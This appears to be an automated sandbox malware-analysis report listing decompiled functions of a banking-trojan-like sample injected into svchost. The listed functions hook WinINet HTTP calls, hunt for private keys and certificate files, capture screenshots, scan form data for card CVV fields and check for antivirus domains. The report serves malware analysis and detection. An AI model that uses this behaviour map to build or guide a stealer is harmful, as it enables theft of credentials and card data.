                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,76231620), ref: 02C800FC
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02C8011E
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02C8012A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02C80140
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02C8015C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02C80178
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02C80194
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02C801B0
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02C801CC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02C801E8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02C80204
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02C80220
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                                    • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                                    • API String ID: 1705253364-835984666
                                                                                                                                                                                                                    • Opcode ID: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                                    • Instruction ID: d3d08d81a9f4b24674397dfb42814877a6d3e56e70194442aa7d9c041c26f86b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9931C771BC031A35FA2276744C46FAF975E4F85F99F018534B803B2445DBA6E70989B8
                                                                                                                                                                                                                    Function 02C8DA40 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02C8DA6D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DAAE
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DAE2
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,7F1BFD21), ref: 02C8DAF7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DB01
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DB09
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DB1A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DB21
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DB5B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8DB68
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21,02CBDAD8,02CBDAD9), ref: 02C8DBA9
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8DBE4
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DBEE
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DBF6
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DC07
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DC0E
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DC4B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8DC58
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8DE40,02CBDAD8,00000000,00000000), ref: 02C8DC8E
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8DCA6
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8DCB7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                                    • String ID: 7F1BFD21$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                                    • API String ID: 448721894-2902503963
                                                                                                                                                                                                                    • Opcode ID: fe3a6b11d3ae989e97f00802c4a965d868f1fef18a7a7015b7a7d6400cd2998a
                                                                                                                                                                                                                    • Instruction ID: 8815aab9caae678beb954c7b7f2384fd36a2e34a63283f0a9db963741f17374a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe3a6b11d3ae989e97f00802c4a965d868f1fef18a7a7015b7a7d6400cd2998a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24712871A406955FD7129F389C58BEABBE8EF85305F14C6D4E98BC7240DB70CA49CB90
                                                                                                                                                                                                                    Function 02C8DE40 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 204filesynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DE69
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DEA8
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DEB4
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DEB8
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DEC7
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DECE
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DF02
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DF08
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DF0C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DF1B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DF22
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8DF2C
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8DFD9
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8E053
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E05E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8E06F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E076
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E088
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E099
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$CreateFilePath$AdminCopyDirectoryFolderHandleMakeMutexSystemUser$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: 7F1BFD21$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                                    • API String ID: 843071566-3237391086
                                                                                                                                                                                                                    • Opcode ID: 63df87b1389e73f310abe04a44552865a79ab70052f19bda21694c9fd6c57f00
                                                                                                                                                                                                                    • Instruction ID: f642bda1ad04707f7f86fbdde485840caa9dd1467792f90a24e1f8482e558661
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63df87b1389e73f310abe04a44552865a79ab70052f19bda21694c9fd6c57f00
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E56115309407859FE3139F789828B637FE8AF86749F2DC598EC8A8B251DB31D901C790
                                                                                                                                                                                                                    Function 02C8DE47 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 202filesynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8DE69
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DEA8
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DEB4
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DEB8
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DEC7
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DECE
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB3A8,00000000), ref: 02C8DF02
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8DF08
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8DF0C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB3A8), ref: 02C8DF1B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8DF22
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8DF2C
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8DFD9
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(02CCB7C8,02CCB6C0,00000000), ref: 02C8E053
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E05E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8E06F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E076
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E088
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E099
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$CreateFilePath$AdminCopyDirectoryFolderHandleMakeMutexSystemUser$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: 7F1BFD21$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                                    • API String ID: 843071566-3237391086
                                                                                                                                                                                                                    • Opcode ID: 0f3de1a9f2c7a9f0d95eda06f328f725c0eb46c2c6d7376dc29f13454d0e5aaf
                                                                                                                                                                                                                    • Instruction ID: 8073210d7dfe9ab2eae567177829af1d7b106da2d0ae7efb7a5e7d2196afdf02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f3de1a9f2c7a9f0d95eda06f328f725c0eb46c2c6d7376dc29f13454d0e5aaf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 166104309407859FE7139F789829B637FE8AF86749F2DC598EC8A8B251DB31D901C790
                                                                                                                                                                                                                    Function 02C92658 Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 310COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C92677
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C926B5
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C926BF
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C926C7
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C926D8
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C926DF
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,?), ref: 02C9273D
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 02C9274C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C92777
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C927D7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2,?,00000000), ref: 02C92817
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C92877
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C928D7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bf8b2$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                    • API String ID: 2433436401-3801798930
                                                                                                                                                                                                                    • Opcode ID: e97a4dd92c6aada3f8315842884981c78afeda46d24dc3508823d473e6baa31c
                                                                                                                                                                                                                    • Instruction ID: e269fe7a14478ff30028027f5ad099ea76403cb8572d759d573ccfae62207c67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e97a4dd92c6aada3f8315842884981c78afeda46d24dc3508823d473e6baa31c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78B10A3190058A5FDF1ACB38986C7EA7BE5AF89300F1449E8EDD5D7240EB71CA48CB95
                                                                                                                                                                                                                    Function 02C80EE0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 187filewindowmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 02C80EF3
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C80F04
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 02C80F19
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C80F2E
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 02C80F48
                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02C80F76
                                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 02C80F8C
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32 ref: 02C80FF0
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 02C81001
                                                                                                                                                                                                                    • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02C81020
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C8131E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C8103C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02C8107D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02C8109A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C810B6
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 02C810BD
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 02C810C4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C810DC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C810EE
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C810FB
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 02C81107
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 02C81113
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileGlobal$CreateObjectWrite$CompatibleHandleRelease$AllocBitmapBitsCloseCursorDeleteFreeInformationLockSelectUnlock
                                                                                                                                                                                                                    • String ID: ($6
                                                                                                                                                                                                                    • API String ID: 1662540191-4149066357
                                                                                                                                                                                                                    • Opcode ID: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                                    • Instruction ID: f65ab8c0bae4c2ed15dfae3902ced4cd321ad6f1f88fe3bb7d017c44247e62ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90612871944340AFD311DF65DC89B6BBBE8EFC8754F048A1CFA4993280DBB4D9058BA2
                                                                                                                                                                                                                    Function 02C8CE00 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7622F380,00000000,00000001,00000000,?,?,?,02C87534,?,?,?,?,?), ref: 02C8CE43
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE51
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE5D
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE6B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE77
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE89
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8CE9F
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8CEB2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02C8CF1B
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02C8CF22
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8CF32
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8CF90,00000000,00000000,00000000), ref: 02C8CF58
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CF70
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8CF81
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                                    • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                                    • API String ID: 1632825432-2817208116
                                                                                                                                                                                                                    • Opcode ID: 06cff44ad58815e4a040bba79dbcd62a40471d294dceda1540010f666d3570b6
                                                                                                                                                                                                                    • Instruction ID: b57f18272183f62abb0d638fa87a6214254d197619b3845fed2fe7836dbc37da
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06cff44ad58815e4a040bba79dbcd62a40471d294dceda1540010f666d3570b6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2412731A80BA12BF71B26385C99FAB679DCFC5A0CF18C253F944D7241DB62DB0582B5
                                                                                                                                                                                                                    Function 02C756F0 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,avast.com,?,?,02C7585C), ref: 02C7570B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kaspersky,?,?,02C7585C), ref: 02C7571B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,drweb,?,?,02C7585C), ref: 02C75727
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,eset.com,?,?,02C7585C), ref: 02C75733
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,antivir,?,?,02C7585C), ref: 02C7573F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,avira,?,?,02C7585C), ref: 02C7574B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,virustotal,?,?,02C7585C), ref: 02C75757
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,virusinfo,?,?,02C7585C), ref: 02C75763
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02C7585C), ref: 02C7576F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,trendsecure,?,?,02C7585C), ref: 02C7577B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,anti-malware,?,?,02C7585C), ref: 02C75787
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02C7585C), ref: 02C75793
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                                    • API String ID: 0-375433535
                                                                                                                                                                                                                    • Opcode ID: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                                    • Instruction ID: d090923e131477c12c4cec90647dd52a86651fcb6ca3814de5afc97d4e454eb4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 260139D63A67E6717A73317A0C92F9F4A8C4ED1CC8B410675FC09E2105E7A6DB0308B5
                                                                                                                                                                                                                    Function 02C8B620 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 164sleepthreadsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8B641
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8B652
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8B660
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8B669
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8B681
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8B693
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 02C8B6A5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B100,00000000,00000000,00000000), ref: 02C8B6BA
                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02C8B6CA
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B6E4
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8B74D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B774
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8B7D7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B7E2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
